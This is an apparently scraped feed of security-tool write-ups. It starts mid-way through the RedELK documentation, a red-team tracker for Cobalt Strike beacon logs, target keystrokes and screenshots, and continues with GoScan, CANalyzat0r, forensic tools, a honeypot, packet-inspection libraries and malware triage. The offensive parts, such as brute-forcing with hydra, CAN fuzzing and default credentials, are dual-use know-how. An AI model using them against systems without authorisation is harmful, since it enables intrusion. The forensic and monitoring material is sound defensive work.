  • /etc/redelk/alarm.json.config: details required for alarms to work. This includes API keys for online services (Virus Total, IBM X-Force, etc) as well as the SMTP details required for sending alarms via e-mail.
If you alter these files prior to your initial setup, these changes will be included in the .tgz packages and can be used for future installations. These files can be found in ./RedELK/elkserver/etc/redelk.
To change the authentication onto Nginx, change /etc/nginx/htpasswd.users to include your preferred credentials. Or ./RedELK/elkserver/etc/nginx/htpasswd.users prior to initial setup.

Under the hood
If you want to take a look under the hood on the ELK server, take a look at the redelk cron file in /etc/cron.d/redelk. It starts several scripts in /usr/share/redelk/bin/. Some scripts are for enrichment, others are for alarming. The configuration of these scripts is done with the config files in /etc/redelk/. There is also heavy enrichment done (including the generation of hyperlinks for screenshots, etc) in logstash. You can check that out directly form the logstash config files in /etc/logstash/conf.d/.

Current state and features on todo-list
This project is still in alpha phase. This means that it works on our machines and our environment, but no extended testing is performed on different setups. This also means that naming and structure of the code is still subject to change.
We are working (and you are invited to contribute) on the following features for next versions:
  • Include the real external IP address of a beacon. As Cobalt Strike has no knowledge of the real external IP address of a beacon session, we need to get this form the traffic index. So far, we have not found a true 100% reliable way for doing this.
  • Support for Apache redirectors. Fully tested and working filebeat and logstash configuration files that support Apache based redirectors. Possibly additional custom log configuration needed for Apache. Low priority.
  • Solve rsyslog max log line issue. Rsyslog (default syslog service on Ubuntu) breaks long syslog lines. Depending on the CS profile you use, this can become an issue. As a result, the parsing of some of the fields are properly parsed by logstash, and thus not properly included in elasticsearch.
  • Ingest manual IOC data. When you are uploading a document, or something else, outside of Cobalt Strike, it will not be included in the IOC list. We want an easy way to have these manual IOCs also included. One way would be to enter the data manually in the activity log of Cobalt Strike and have a logstash filter to scrape the info from there.
  • Ingest e-mails. Create input and filter rules for IMAP mailboxes. This way, we can use the same easy ELK interface for having an overview of sent emails, and replies.
  • User-agent checks. Tagging and alarming on suspicious user-agents. This will probably be divided in hardcoded stuff like curl, wget, etc connecting with the proper C2 URL's, but also more dynamic analysis of suspicious user-agents.
  • DNS traffic analyses. Ingest, filter and query for suspicious activities on the DNS level. This will take considerable work due to the large amount of noise/bogus DNS queries performed by scanners and online DNS inventory services.
  • Other alarm channels. Think Slack, Telegram, whatever other way you want for receiving alarms.
  • Fine grained authorisation. Possibility for blocking certain views, searches, and dashboards, or masking certain details in some views. Useful for situations where you don't want to give out all information to all visitors.

Usage
First time login
Browse to your RedELK server's IP address and login with the credentials from Nginx (default is redelk:redelk). You are now in a Kibana interface. You may be asked to create a default index for kibana. You can select any of the available indices, it doesn't matter which one you pick.
There are probably two things you want to do here: look at dashboards, or look and search the data in more detail. You can switch between those views using the buttons on the left bar (default Kibana functionality).

Dashboards
Click on the dashboard icon on the left, and you'll be given 2 choices: Traffic and Beacon.




Looking and searching data in detail
Click on the Discover button to look at and search the data in more detail. Once there, click the time range you want to use and click on the 'Open' button to use one of the prepared searches with views.


Beacon data
When selecting the search 'TimelineOverview' you are presented with an easy to use view on the data from the Cobalt Strike teamservers, a time line of beacon events if you like. The view includes the relevant columns you want to have, such as timestamp, testscenario name, username, beacon ID, hostname, OS and OS version. Finally, the full message from Cobalt Strike is shown.


You can modify this search to your liking. Also, because its elasticsearch, you can search all the data in this index using the search bar.
Clicking on the details of a record will show you the full details. An important field for usability is the beaconlogfile field. This field is an hyperlink, linking to the full beacon log file this record is from. Its allows you to look at the beacon transcript in a bigger windows and use CTRL+F within it.


Screenshots
RedELK comes with an easy way of looking at all the screenshots that were made from your targets. Select the 'Screenshots' search to get this overview. We added two big usability things: thumbnails and hyperlinks to the full pictures. The thumbnails are there to quickly scroll through and give you an immediate impression: often you still remember what the screenshot looked like.


Keystrokes
Just as with screenshots, its very handy to have an easy overview of all keystrokes. This search gives you the first lines of cententi, as well as again an hyperlink to the full keystrokes log file.


IOC data
To get a quick list of all IOCs, RedELK comes with an easy overview. Just use the 'IOCs' search to get this list. This will present all IOC data from Cobalt Strike, both from files and from services.



You can quickly export this list by hitting the 'Reporting' button in the top bar to generate a CSV of this exact view.
Logging of RedELK
During installation all actions are logged in a log file in the current working directory.
During operations, all RedELK specific logs are logged on the ELK server in /var/log/redelk. You probably only need this for troubleshooting.

Authors and contribution
This project is developed and maintained by:
  • Marc Smeets (@smeetsie on Github and @mramsmeets on Twitter).
  • Mark Bergman (@xychix on Github and Twitter)



Goscan - Interactive Network Scanner

$
0
0

GoScan is an interactive network scanner client, featuring auto-completion, which provides abstraction and automation over nmap.
Although it started as a small side-project I developed in order to learn @golang, GoScan can now be used to perform host discovery, port scanning, and service enumeration not only in situations where being stealthy is not a priority and time is limited (think at CTFs, OSCP, exams, etc.), but also (with a few tweaks in its configuration) during professional engagements.
GoScan is also particularly suited for unstable environments (think unreliable network connectivity, lack of "screen", etc.), given that it fires scans and maintain their state in an SQLite database. Scans run in the background (detached from the main thread), so even if connection to the box running GoScan is lost, results can be uploaded asynchronously (more on this below). That is, data can be imported into GoScan at different stages of the process, without the need to restart the entire process from scratch if something goes wrong.
In addition, the Service Enumeration phase integrates a collection of other tools (e.g., EyeWitness, Hydra, nikto, etc.), each one tailored to target a specific service. 

Installation

Binary installation (Recommended)
Binaries are available from the Release page.
# Linux (64bit)
$ wget https://github.com/marco-lancini/goscan/releases/download/v2.1/goscan_2.1_linux_amd64.zip
$ unzip goscan_2.1_linux_amd64.zip

# Linux (32bit)
$ wget https://github.com/marco-lancini/goscan/releases/download/v2.1/goscan_2.1_linux_386.zip
$ unzip goscan_2.1_linux_386.zip

# After that, place the executable in your PATH
$ chmod +x goscan
$ sudo mv ./goscan /usr/local/bin/goscan

Build from source
$ git clone https://github.com/marco-lancini/goscan.git
$ cd goscan/goscan/
$ make setup
$ make build
To create a multi-platform binary, use the cross command via make:
$ make cross

Docker
$ git clone https://github.com/marco-lancini/goscan.git
$ cd goscan/
$ docker-compose up --build

Usage
GoScan supports all the main steps of network enumeration:


StepCommands
1. Load targets
  • Add a single target via the CLI (must be a /32): load target SINGLE <IP>
  • Upload multiple targets from a text file or folder: load target MULTI <path-to-file>
2. Host Discovery
  • Perform a Ping Sweep: sweep <TYPE> <TARGET>
  • Or load results from a previous discovery:
    • Add a single alive host via the CLI (must be a /32): load alive SINGLE <IP>
    • Upload multiple alive hosts from a text file or folder: load alive MULTI <path-to-file>
3. Port Scanning
  • Perform a port scan: portscan <TYPE> <TARGET>
  • Or upload nmap results from XML files or folder: load portscan <path-to-file>
4. Service Enumeration
  • Dry Run (only show commands, without performing them): enumerate <TYPE> DRY <TARGET>
  • Perform enumeration of detected services: enumerate <TYPE> <POLITE/AGGRESSIVE> <TARGET>
5. Special Scans
  • EyeWitness
    • Take screenshots of websites, RDP services, and open VNC servers (KALI ONLY): special eyewitness
    • EyeWitness.py needs to be in the system path
  • Extract (Windows) domain information from enumeration data
    • special domain <users/hosts/servers>
  • DNS
    • Enumerate DNS (nmap, dnsrecon, dnsenum): special dns DISCOVERY <domain>
    • Bruteforce DNS: special dns BRUTEFORCE <domain>
    • Reverse Bruteforce DNS: special dns BRUTEFORCE_REVERSE <domain> <base_IP>
Utils
  • Show results: show <targets/hosts/ports
  • Change the output folder (by default ~/goscan): set output_folder <PATH>
  • Modify the default nmap switches: set nmap_switches <SWEEP/TCP_FULL/TCP_STANDARD/TCP_VULN/UDP_STANDARD> <SWITCHES>
  • Modify the default wordlists: set_wordlists <FINGER_USER/FTP_USER/...> <PATH>

External Integrations
The Service Enumeration phase currently supports the following integrations:
WHATINTEGRATION
ARP
  • nmap
DNS
  • nmap
  • dnsrecon
  • dnsenum
  • host
FINGER
  • nmap
  • finger-user-enum
FTP
  • nmap
  • ftp-user-enum
  • hydra [AGGRESSIVE]
HTTP
  • nmap
  • nikto
  • dirb
  • EyeWitness
  • sqlmap [AGGRESSIVE]
  • fimap [AGGRESSIVE]
RDP
  • nmap
  • EyeWitness
SMB
  • nmap
  • enum4linux
  • nbtscan
  • samrdump
SMTP
  • nmap
  • smtp-user-enum
SNMP
  • nmap
  • snmpcheck
  • onesixtyone
  • snmpwalk
SSH
  • hydra [AGGRESSIVE]
SQL
  • nmap
VNC
  • EyeWitness


DFIRTrack - The Incident Response Tracking Application

$
0
0

DFIRTrack (Digital Forensics and Incident ResponseTracking application) is an open source web application mainly based on Django using a PostgreSQL database backend.
In contrast to other great incident response tools, which are mainly case-based and support the work of CERTs, SOCs etc. in their daily business, DFIRTrack is focused on handling one major incident with a lot of affected systems as it is often observed in APT cases. It is meant to be used as a tool for dedicated incident response teams in large cases. So, of course, CERTs and SOCs may use DFIRTrack as well, but they may feel it will be more appropriate in special cases instead of every day work.
In contrast to case-based applications, DFIRTrack works in a system-based fashion. It keeps track of the status of various systems and the tasks associated with them, keeping the analyst well-informed about the status and number of affected systems at any time during the investigation phase up to the remediation phase of the incident response process.

Features
One focus is the fast and reliable import and export of systems and associated information. The goal for importing systems is to provide a fast and error-free procedure. Moreover, the goal for exporting systems and their status is to have multiple instances of documentation: for instance, detailed Markdown reports for technical staff vs. spreadsheets for non-technical audiences without redundancies and deviations in the data sets. A manager whose numbers match is a happy manager! ;-)
The following functions are implemented for now:
  • Importer
    • Creator (fast creation of multiple related instances via web interface) for systems and tasks,
    • CSV (simple and generic CSV based import (either hostname and IP or hostname and tags combined with a web form), should fit for the export capabilities of many tools),
    • Markdown for entries (one entry per system(report)).
  • Exporter
    • Markdown for so-called system reports (for use in a MkDocs structure),
    • Spreadsheet (CSV and XLS),
    • LaTeX (planned).

Installation and dependencies
DFIRTrack is developed for deploying on Debian Stretch or Ubuntu 16.04. Other Debian based distributions or versions may work but were not tested yet. At the moment the project will be focused on Ubuntu LTS and Debian releases.
For fast and uncomplicated installation on a dedicated server including all dependencies an Ansible playbook and role was written (available here). For testing a docker environment was prepared (see below).
For a minimal setup the following dependencies are needed:
  • django (2.0),
  • django_q,
  • djangorestframework,
  • gunicorn,
  • postgresql,
  • psycopg2-binary,
  • python3-pip,
  • PyYAML,
  • requests,
  • virtualenv,
  • xlwt.
Note that there is no settings.py in this repository.This file is submitted via Ansible or has to be copied and configured by hand. That will be changed in the future (see issues for more information).

Docker Environment
An experimental Docker Compose environment for local-only usage is provided in this project. Run the following command in the project root directory to start the environment:
docker-compose up
A user admin is already created. A password can be set with:
docker/setup_admin.sh
The application is located at localhost:8000.

Built-in software
The application was created by implementing the following libraries and code:

Development
There are two main branches:
  • master
  • development
The master branch should be stable (as you can expect from an alpha version). New features and changes are added to the development branch and merged into master from time to time. Everything merged into development should run too but might need manual changes (e. g. config). Devolopment branch of DFIRTrack Ansible should follow these changes. So if you want to see the latest features and progress: "check out" development.

Disclaimer
This software is in an early alpha phase so a lot of work has to be done. Even if some basic error checking is implemented, as of now the usage of DFIRTrack mainly depends on proper handling.
DFIRTrack was not and most likely will never be intended for usage on publicly available servers. Nevertheless some basic security features were implemented (in particular in connection with the corresponding ansible role) always install DFIRTrack in a secured environment (e. g. a dedicated virtual machine or in a separated network)!


CANalyzat0r - Security Analysis Toolkit For Proprietary Car Protocols

$
0
0

This software project is a result of a Bachelor's thesis created at SCHUTZWERK in collaboration with Aalen University by Philipp Schmied.
Please refer to the corresponding blog post for more information.

Why another CAN tool?
  • Built from scratch with new ideas for analysis mechanisms
  • Bundles features of many other tools in one place
  • Modular and extensible: Read the docs and implement your own analysis mechanisms
  • Comfortable analysis using a GUI
  • Manage work in separate projects using a database
  • Documentation: Read the docs if you need a manual or technical info.

Installing and running:
  • Run sudo ./install_requirements.sh along with sudo -E ./CANalyzat0r.sh. This will create a folder called pipenv with a pipenv environment in it.
  • Or just use the docker version which is recommended at this time (Check the README.md file in the subdirectory)
For more information, read the HTML or PDF version of the documentation in the ./doc/build folder.

Features
  • Manage interface configuration (automatic loading of kernel modules, manage physical and virtual SocketCAN devices)
  • Multi interface support
  • Manage your work in projects. You can also import and export them in the human readable/editable JSON format
  • Logging of all actions
  • Graphical sniffing
  • Manage findings, dumps and known packets per project
  • Easy copy and paste between tabs. Also, you can just paste your SocketCAN files into a table that allows pasting
  • Threaded Sending, Fuzzing and Sniffing 




  • Add multiple analyzing threads on the GUI
  • Ignore packets when sniffing - Automatically filter unique packets by ID or data and ID
  • Compare dumps
  • Allows setting up complex setups using only one window
  • Clean organization in tabs for each analysis task
  • Binary packet filtering with randomization
  • Search for action specific packets using background noise filtering

  • SQLite support
  • Fuzz and change the values on the fly

  • Testing It
    You can use the Instrument Cluster Simulator in order to tinker with a virtual CAN bus without having to attach real CAN devices to your machine.

    Troubleshooting

    Empty GUI Windows
    Please make sure that the QT_X11_NO_MITSHM environment variable is set to 1. When using sudo, please include the -E option in order to preserve this environment variable as follows: sudo -E ./CANalyzat0r.sh.

    Fixing the GUI style
    This application has to be run as superuser. Because of a missing configuration, the displayed style can be set to an unwanted value when the effective UID is 0. To fix this behaviour, follow these steps:
    • Quick way: Execute echo "[QT]\nstyle=CleanLooks" >> ~/.config/Trolltech.conf
    • Alternative way:
      • Install qt4-qtconfig: sudo apt-get install qt4-qtconfig
      • Run qtconfig-qt4 as superuser and change the GUI style to CleanLooks or GTK+
    • Or use the docker container


    Process Hacker - A Free, Powerful, Multi-Purpose Tool That Helps You Monitor System Resources, Debug Software And Detect Malware

    $
    0
    0

    A free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware.

    System requirements
    Windows 7 or higher, 32-bit or 64-bit.

    Features
    • A detailed overview of system activity with highlighting.
    • Graphs and statistics allow you quickly to track down resource hogs and runaway processes.
    • Can't edit or delete a file? Discover which processes are using that file.
    • See what programs have active network connections, and close them if necessary.
    • Get real-time information on disk access.
    • View detailed stack traces with kernel-mode, WOW64 and .NET support.
    • Go beyond services.msc: create, edit and control services.
    • Small, portable and no installation required.
    • 100% Free Software (GPL v3)

    Building the project
    Requires Visual Studio (2017 or later).
    Execute build_release.cmd located in the build directory to compile the project or load the ProcessHacker.sln and Plugins.sln solutions if you prefer building the project using Visual Studio.
    You can download the free Visual Studio Community Edition to build, run or develop Process Hacker.

    Additional information
    You cannot run the 32-bit version of Process Hacker on a 64-bit system and expect it to work correctly, unlike other programs.

    Enhancements/Bugs
    Please use the GitHub issue tracker for reporting problems or suggesting new features.

    Settings
    If you are running Process Hacker from a USB drive, you may want to save Process Hacker's settings there as well. To do this, create a blank file named "ProcessHacker.exe.settings.xml" in the same directory as ProcessHacker.exe. You can do this using Windows Explorer:
    1. Make sure "Hide extensions for known file types" is unticked in Tools > Folder options > View.
    2. Right-click in the folder and choose New > Text Document.
    3. Rename the file to ProcessHacker.exe.settings.xml (delete the ".txt" extension).

    Plugins
    Plugins can be configured from Hacker > Plugins.
    If you experience any crashes involving plugins, make sure they are up to date.
    Disk and Network information provided by the ExtendedTools plugin is only available when running Process Hacker with administrative rights.

    KProcessHacker
    Process Hacker uses a kernel-mode driver, KProcessHacker, to assist with certain functionality. This includes:
    • Capturing kernel-mode stack traces
    • More efficiently enumerating process handles
    • Retrieving names for file handles
    • Retrieving names for EtwRegistration objects
    • Setting handle attributes
    Note that by default, KProcessHacker only allows connections from processes with administrative privileges (SeDebugPrivilege). To allow Process Hacker to show details for all processes when it is not running as administrator:
    1. In Registry Editor, navigate to: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\KProcessHacker3
    2. Under this key, create a key named Parameters if it does not exist.
    3. Create a DWORD value named SecurityLevel and set it to 2. If you are not using an official build, you may need to set it to 0 instead.
    4. Restart the KProcessHacker3 service (sc stop KProcessHacker3, sc start KProcessHacker3).


    OSFMount - Mount Disk Images & Create RAM Drives

    $
    0
    0

    OSFMount allows you to mount local disk image files (bit-for-bit copies of a disk partition) in Windows with a drive letter. You can then analyze the disk image file with PassMark OSForensics™ by using the mounted volume's drive letter. By default, the image files are mounted as read only so that the original image files are not altered.

    OSFMount also supports the creation of RAM disks, basically a disk mounted into RAM. This generally has a large speed benefit over using a hard disk. As such this is useful with applications requiring high speed disk access, such a database applications, games (such as game cache files) and browsers (cache files). A second benefit is security, as the disk contents are not stored on a physical hard disk (but rather in RAM) and on system shutdown the disk contents are not persistent. At the time of writing, we believe this is the fastest RAM drive software available.

    OSFMount supports mounting images of CDs in .ISO format , which can be useful when a particular CD is used often and the speed of access is important.


    HTTrack Website Copier - Web Crawler And Offline Browser

    $
    0
    0

    HTTrack allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.

    WinHTTrack is the Windows (from Windows 2000 to Windows 10 and above) release of HTTrack, and WebHTTrack the Linux/Unix/BSD release.



    Volatility Workbench - A GUI For Volatility Memory Forensics

    $
    0
    0

    Volatility Workbench is a graphical user interface (GUI) for the Volatility tool. Volatility is a command line memory analysis and forensics tool for extracting artifacts from memory dumps. Volatility Workbench is free, open source and runs in Windows. 

    It provides a number of advantages over the command line version including:
    • No need of remembering command line parameters.
    • Storage of the operating system profile, KDBG address and process list with the memory dump, in a .CFG file. When a memory image is re-loaded, this saves a lot of time and avoids the frustration of not knowing the correct profile to select.
    • Simpler copy & paste.
    • Simpler printing of paper copies (via right click).
    • Simpler saving of the dumped information to a file on disk.
    • A drop down list of available commands and a short description of what the command does.
    • Time stamping of the commands executed.
    • Auto-loading the first dump file found in the current folder.
    • Support for analysing Mac and Linux memory dumps.


    Hontel - Telnet Honeypot

    $
    0
    0

    HonTel is a Honeypot for Telnet service. Basically, it is a Python v2.x application emulating the service inside the chroot environment. Originally it has been designed to be run inside the Ubuntu environment, though it could be easily adapted to run inside any Linux environment.

    Documentation:
    Setting the environment and running the application requires intermmediate Linux administration knowledge. The whole deployment process can be found "step-by-step" inside the deploy.txt file. Configuration settings can be found and modified inside the hontel.py itself. For example, authentication credentials can be changed from default root:123456 to some arbitrary values (options AUTH_USERNAME and AUTH_PASSWORD), custom Welcome message can be changed from default (option WELCOME), custom hostname (option FAKE_HOSTNAME), architecture (option FAKE_ARCHITECTURE), location of log file (inside the chroot environment) containing all telnet commands (option LOG_PATH), location of downloaded binary files dropped by connected users (option SAMPLES_DIR), etc.

    Note: Some botnets tend to delete the files from compromised hosts (e.g. /bin/bash) in order to harden itself from potential attempts of cleaning and/or attempts of installation coming from other (concurent) botnets. In such cases either the whole chroot environment has to be reinstalled or host directory where the chroot directory resides (e.g. /srv/chroot/) should be recovered from the previously stored backup (recommended).


    nDPI - Open Source Deep Packet Inspection Software Toolkit

    $
    0
    0

    nDPI is a ntop-maintained superset of the popular OpenDPI library. Released under the LGPL license, its goal is to extend the original library by adding new protocols that are otherwise available only on the paid version of OpenDPI. In addition to Unix platforms, we also support Windows, in order to provide you a cross-platform DPI experience. Furthermore, we have modified nDPI do be more suitable for traffic monitoring applications, by disabling specific features that slow down the DPI engine while being them un-necessary for network traffic monitoring.
    nDPI is used by both ntop and nProbe for adding application-layer detection of protocols, regardless of the port being used. This means that it is possible to both detect known protocols on non-standard ports (e.g. detect http on ports other than 80), and also the opposite (e.g. detect Skype traffic on port 80). This is because nowadays the concept of port=application no longer holds.

    Many protocols are supported including:

    • FTP
    • POP
    • SMTP
    • IMAP
    • DNS
    • IPP
    • HTTP
    • MDNS
    • NTP
    • NETBIOS
    • NFS
    • SSDP
    • BGP
    • SNMP
    • XDMCP
    • SMB
    • SYSLOG
    • DHCP
    • PostgreSQL
    • MySQL
    • TDS
    • DirectDownloadLink
    • I23V5
    • AppleJuice
    • DirectConnect
    • Socrates
    • WinMX
    • VMware
    • PANDO
    • Filetopia
    • iMESH
    • Kontiki
    • OpenFT
    • Kazaa/Fasttrack
    • Gnutella
    • eDonkey
    • Bittorrent
    • OFF
    • AVI
    • Flash
    • OGG
    • MPEG
    • QuickTime
    • RealMedia
    • Windowsmedia
    • MMS
    • XBOX
    • QQ
    • MOVE
    • RTSP
    • Feidian
    • Icecast
    • PPLive
    • PPStream
    • Zattoo
    • SHOUTCast
    • SopCast
    • TVAnts
    • TVUplayer
    • VeohTV
    • QQLive
    • Thunder/Webthunder
    • Soulseek
    • GaduGadu
    • IRC
    • Popo
    • Jabber
    • MSN
    • Oscar
    • Yahoo
    • Battlefield
    • Quake
    • VRRP
    • Steam
    • Halflife2
    • World of Warcraft
    • Telnet
    • STUN
    • IPSEC
    • GRE
    • ICMP
    • IGMP
    • EGP
    • SCTP
    • OSPF
    • IP in IP
    • RTP
    • RDP
    • VNC
    • PCAnywhere
    • SSL
    • SSH
    • USENET
    • MGCP
    • IAX
    • TFTP
    • AFP
    • StealthNet
    • Aimini
    • SIP
    • Truphone
    • ICMPv6
    • DHCPv6
    • Armagetron
    • CrossFire
    • Dofus
    • Fiesta
    • Florensia
    • Guildwars
    • HTTP Application Activesync
    • Kerberos
    • LDAP
    • MapleStory
    • msSQL
    • PPTP
    • WARCRAFT3
    • World of Kung Fu
    • MEEBO
    • FaceBook
    • Twitter
    • DropBox
    • Gmail
    • Google Maps
    • YouTube
    • Skype
    • Google
    • DCE RPC
    • NetFlow_IPFIX
    • sFlow
    • HTTP Connect (SSL over HTTP)
    • HTTP Proxy
    • Netflix
    • Citrix
    • CitrixOnline/GotoMeeting
    • Apple (iMessage, FaceTime…)
    • Webex
    • WhatsApp
    • Apple iCloud
    • Viber
    • Apple iTunes
    • Radius
    • WindowsUpdate
    • TeamViewer
    • Tuenti
    • LotusNotes
    • SAP
    • GTP
    • UPnP
    • LLMNR
    • RemoteScan
    • Spotify
    • H323
    • OpenVPN
    • NOE
    • CiscoVPN
    • TeamSpeak
    •  Tor
    •  CiscoSkinny
    •  RTCP
    •  RSYNC
    •  Oracle
    •  Corba
    •  UbuntuONE
    •  CNN
    •  Wikipedia
    • Whois-DAS
    •  Collectd
    •  Redis
    •  ZeroMQ
    •  Megaco
    • QUIC
    • WhatsApp Voice
    • Stracraft
    • Teredo
    • Snapchat
    • Simet
    • OpenSignal
    • 99Taxi
    • GloboTV
    • Deezer
    • Instagram
    • Microsoft cloud services
    • Twitch
    • KakaoTalk Voice and Chat
    • HotspotShield VPN


      Pftriage - Python Tool And Library To Help Analyze Files During Malware Triage And Analysis

      $
      0
      0

      pftriage is a tool to help analyze files during malware triage. It allows an analyst to quickly view and extract properties of a file to help during the triage process. The tool also has an analyze function which can detect common malicious indicators used by malware.

      Dependencies
      • pefile
      • filemagic
      Note: On Mac - Apple has implemented their own version of the file command. However, libmagic can be installed using homebrew
      $ brew install libmagic

      Usage
      usage: pftriage [options]

      Show information about a file for triage.

      positional arguments:
      file The file to triage.

      optional arguments:
      -h, --help show this help message and exit
      -i, --imports Display import tree
      -s, --sections Display overview of sections. For more detailed info
      pass the -v switch
      --removeoverlay Remove overlay data.
      --extractoverlay Extract overlay data.
      -r, --resources Display resource informations
      -D DUMP_OFFSET, --dump DUMP_OFFSET
      Dump data using the passed offset or 'ALL'. Currently
      only works with resources.
      -a, --analyze Analyze the file.
      -v, --verbose Display version.
      -V, --version Print version and exit.

      Sections
      Display Section information by using the -s or --sections switch. Additionally you can pass (-v) for a more verbose view of section details.
      To export a section pass --dump and the desired section Virtual Address. (ex: --dump 0x00001000)
       ---- Section Overview (use -v for detailed section info)  ----

      Name Raw Size Raw Data Pointer Virtual Address Virtual Size Entropy Hash
      .text 0x00012200 0x00000400 0x00001000 0x000121d8 6.71168555177 ff38fce4f48772f82fc77b4ef223fd74
      .rdata 0x00005a00 0x00012600 0x00014000 0x0000591a 4.81719489022 b0c15ee9bf8480a07012c2cf277c3083
      .data 0x00001a00 0x00018000 0x0001a000 0x0000ab80 5.28838495072 5d969a878a5106ba526aa29967ef877f
      .rsrc 0x00002200 0x00019a00 0x00025000 0x00002144 7.91994689603 d361caffeadb934c9f6b13b2474c6f0f
      .overlay 0x00009b30 0x0001bc00 0x00000000 0x00000000 0 N/A

      Resources
      Display resource data by using -r or --resources.
       ---- Resource Overview ----

      Type: CODATA
      Name Language SubLang Offset Size Code Page Type
      0x68 LANG_RUSSIAN RUSSIAN 0x000250e0 0x00000cee 0x000004e4
      0x69 LANG_RUSSIAN RUSSIAN 0x00025dd0 0x000011e6 0x000004e4

      Type: RT_MANIFEST
      Name Language SubLang Offset Size Code Page Type
      0x1 LANG_ENGLISH ENGLISH_US 0x00026fb8 0x0000018b 0x000004e4
      To extract a specific resource use -D with the desired offset. If you want to extract all resources pass ALL istead of a specific offset.

      Imports
      Display Import data and modules using -i or --imports. Imports which are identified as ordinals will be identified and include the Ordinal used.
      [*] Loading File...
      ---- Imports ----
      Number of imported modules: 4

      KERNEL32.dll
      |-- GetProcessHeap
      |-- HeapFree
      |-- HeapAlloc
      |-- SetLastError
      |-- GetLastError

      WS2_32.dll
      |-- getaddrinfo
      |-- freeaddrinfo
      |-- closesocket Ordinal[3] (Imported by Ordinal)
      |-- WSAStartup Ordinal[115] (Imported by Ordinal)
      |-- socket Ordinal[23] (Imported by Ordinal)
      |-- send Ordinal[19] (Imported by Ordinal)
      |-- recv Ordinal[16] (Imported by Ordinal)
      |-- connect Ordinal[4] (Imported by Ordinal)

      ole32.dll
      |-- CoCreateInstance
      |-- ...

      Exports
      Display exports using -e or --exports.
      [*] Loading File...

      ---- Exports ----
      Total Exports: 5
      Address Ordinal Name
      0x00001151 1 FindResources
      0x00001103 2 LoadBITMAP
      0x00001137 3 LoadICON
      0x000010e9 4 LoadIMAGE
      0x0000111d 5 LoadSTRINGW

      Metadata
      File and version metadata is displayed if no options are passed on the commandline.
      [*] Loading File...
      [*] Processing File details...


      ---- File Summary ----

      General
      Filename samaple.exe
      Magic Type PE32 executable (GUI) Intel 80386, for MS Windows
      Size 135168
      First Bytes 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00

      Hashes
      MD5 8e8a8fe8361c7238f60d6bbfdbd304a8
      SHA1 557832efe10daff3f528a3c3589eb5a6dfd12447
      SHA256 118983ba4e1c12a366d7d6e9461c68bf222e2b03f3c1296091dee92ac0cc9dd8
      Import Hash 0239fd611af3d0e9b0c46c5837c80e09
      ssdeep

      Headers
      Subsystem IMAGE_SUBSYSTEM_WINDOWS_GUI
      Linker Version 12.0 - (Visual Studio 2013)
      Image Base 0x400000
      Compile Time Thu Jun 23 16:04:21 2016 UTC
      Checksum 0
      Filename sample.exe
      EP Bytes 55 8b ec 51 83 65 fc 00 8d 45 fc 56 57 50 e8 64
      Signature 0x4550
      First Bytes 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00
      Sections 4
      Entry Point 0x139de
      Packed False
      Size 135168
      Characteristics
      IMAGE_FILE_32BIT_MACHINE
      IMAGE_FILE_EXECUTABLE_IMAGE
      IMAGE_FILE_RELOCS_STRIPPED

      Analyze
      PFTriage can performa a simple analysis of a file to identify malicious characteristics.
      [*] Loading File...
      [*] Analyzing File...
      [*] Analysis Complete...

      [!] Checksum Invalid CheckSum
      [!] AntiDebug AntiDebug Function import [GetTickCount]
      [!] AntiDebug AntiDebug Function import [QueryPerformanceCounter]
      [!] Imports Suspicious API Call [TerminateProcess]
      [!] AntiDebug AntiDebug Function import [SetUnhandledExceptionFilter]
      [!] AntiDebug AntiDebug Function import [IsDebuggerPresent]

      Overlay Data
      Overlay data is identified by analyzing or displaying section information of the file. If overlay data exists PFTriage can either remove the data by using the (--removeoverlay) switch or export the overlay data by using the (--extractoverlay) switch.


      PF_RING - High-Speed Packet Capture, Filtering And Analysis

      $
      0
      0

      PF_RING™ is a new type of network socket that dramatically improves the packet capture speed, and that’s characterized by the following properties:
      1. Available for Linux kernels 2.6.32 and newer.
      2. No need to patch the kernel: just load the kernel module.
      3. 10 Gbit Hardware Packet Filtering using commodity network adapters
      4. User-space ZC (new generation DNA, Direct NIC Access) drivers for extreme packet capture/transmission speed as the NIC NPU (Network Process Unit) is pushing/getting packets to/from userland without any kernel intervention. Using the 10Gbit ZC driver you can send/received at wire-speed at any packet sizes.
      5. PF_RING ZC library for distributing packets in zero-copy across threads, applications, Virtual Machines.
      6. Device driver independent.
      7. Support of Accolade, Exablaze, Endace, Fiberblaze, Inveatech, Mellanox, Myricom/CSPI, Napatech, Netcope and Intel (ZC) network adapters.
      8. Kernel-based packet capture and sampling.
      9. Libpcap support (see below) for seamless integration with existing pcap-based applications.
      10. Ability to specify hundred of header filters in addition to BPF.
      11. Content inspection, so that only packets matching the payload filter are passed.
      12. PF_RING™ plugins for advanced packet parsing and content filtering.

      If you want to know about PF_RING™ internals or for the User’s Manual visit the Documentation section.



      UEFI Firmware Parser - Parse BIOS/Intel ME/UEFI Firmware Related Structures: Volumes, FileSystems, Files, Etc

      $
      0
      0

      The UEFI firmware parser is a simple module and set of scripts for parsing, extracting, and recreating UEFI firmware volumes. This includes parsing modules for BIOS, OptionROM, Intel ME and other formats too. Please use the example scripts for parsing tutorials.


      Installation
      This module is included within PyPy as uefi_firmware
      $ sudo pip install uefi_firmware
      To install from Github, checkout this repo and use:
      $ sudo python ./setup.py install
      Requirements
      • Python development headers, usually found in the python-dev package.
      • The compression/decompression features will use the python headers and gcc.
      • pefile is optional, and may be used for additional parsing.

      Usage
      The simplest way to use the module to detect or parse firmware is through the AutoParser class.
      import uefi_firmware
      with open('/path/to/firmware.rom', 'r') as fh:
      file_content = fh.read()
      parser = uefi_firmware.AutoParser(file_content)
      if parser.type() != 'unknown':
      firmware = parser.parse()
      firmware.showinfo()
      There are several classes within the uefi, pfs, me, and flash packages that accept file contents in their constructor. In all cases there are abstract methods implemented:
      • process() performs parsing work and returns a True or False
      • showinfo() print a hierarchy of information about the structure
      • dump() walk the hierarchy and write each to a file

      Scripts
      A Python script is installed uefi-firmware-parser
      $ uefi-firmware-parser -h
      usage: uefi-firmware-parser [-h] [-b] [--superbrute] [-q] [-o OUTPUT] [-O]
